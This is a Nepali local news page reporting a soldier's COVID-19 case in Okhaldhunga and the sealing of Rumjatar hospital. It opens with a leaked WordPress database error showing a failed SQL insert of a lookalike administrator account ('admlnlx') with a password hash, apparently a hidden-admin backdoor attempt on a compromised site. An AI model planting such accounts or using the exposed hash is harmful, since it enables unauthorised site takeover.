WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6UPlb2PRKJ1pqG.CZPmpXUGfpY5nI/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 08:38:32', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । ओखलढुंगा जिल्लामा स्थित अरिदमन गणमा कार्यरत एकजना नेपाली सेनालाई कोरोना (कोभिड–१९) पुष्ठि भएको छ ।
बिरामी सेनलाई सुरुमा जिल्ला अस्पताल रुम्जटार र ओखलढुंगा सममूदायीक अस्पतालमा उपचार गरिएको थियो । कोरोना (कोभिड–१९) को लक्षण देखिए पछि हेलिकप्टर मार्फत काठमाण्डौं लगि परिक्षण गर्दा कोरोना पुष्ठि भएको हो ।
कोरोना पुष्ठि भएका सेना ३५ निद अगाडि घरबाट डिउटिमा फर्किएको अरिदमन गणले जनाएको छ । उक्त सेनामा कोरोना (कोभिड-१९) पुष्ठि भएपछि सुरुमा उपचार गरिएको जिल्ला अस्पताल रुम्जटार सिल गरिएको छ ।